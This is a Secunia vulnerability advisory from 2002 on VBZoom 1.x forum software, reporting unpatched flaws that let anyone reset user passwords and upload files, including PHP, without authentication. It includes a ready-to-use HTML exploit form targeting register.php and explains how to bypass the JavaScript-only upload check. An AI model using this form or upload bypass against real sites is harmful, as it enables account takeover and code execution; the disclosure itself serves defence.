|
VBZoom password reset and file upload
|
|
Secunia Advisory:
|
SA7260
|
|
|
Release Date:
|
2002-10-09
|
|
Last Update:
|
2002-10-11
|
|
Popularity:
|
3,111 views
|
|
|
Critical:
|
 Highly critical
|
|
Impact:
|
Security Bypass
|
|
Where:
|
From remote
|
|
Solution Status:
|
Unpatched
|
|
| Software: | VBZooM 1.x
|
|
|
Subscribe:
|
Instant alerts on relevant vulnerabilities
|
|
Description: VBZoom allows attackers to reset passwords of valid users.
By constructing a malicious POST request to VBZoom, it is possible to trick VBZoom into changing a users password and data without authentication:
<form name="f1" action="http://victim/vbzoom/register.php" method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="HomePage">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form>
Also you may upload files without authentication, authentication is done in a javascript, but by saving the upload page to your local harddrive and editing the form you may upload files without further authentication.
These files could even be .php files, allowing users to execute arbitrary code as the web server user.
Solution: We are not aware of updates to this issue. Either change the code to do proper authentication or implement another forum.
Provided and/or discovered by: hish _ hish
M. Zeeshan Mustafa
Changelog: 09/10-2002 Information about upload vulnerability added, hish _ hish
11/10-2002 Information about upload of arbitrary code (php/perl etc.), M. Zeeshan Mustafa
|
|
|
Track this Secunia Advisory
|
Customers of the Secunia Vulnerability Intelligence solutions will automatically receive updates when new information regarding this advisory is released.
Read more about our Vulnerability Intelligence solutions and what they can do for you and your company.
|
|
|
About this Secunia Advisory
|
Please note: The information that this Secunia Advisory is based on comes from a third party unless stated otherwise.
Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others.
|
|
|
10th Oct, 2008
|
New advisories:
|
15 |
|
New vulnerabilities:
|
83 |
|
Updated advisories:
|
41 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Solutions | More...
|
|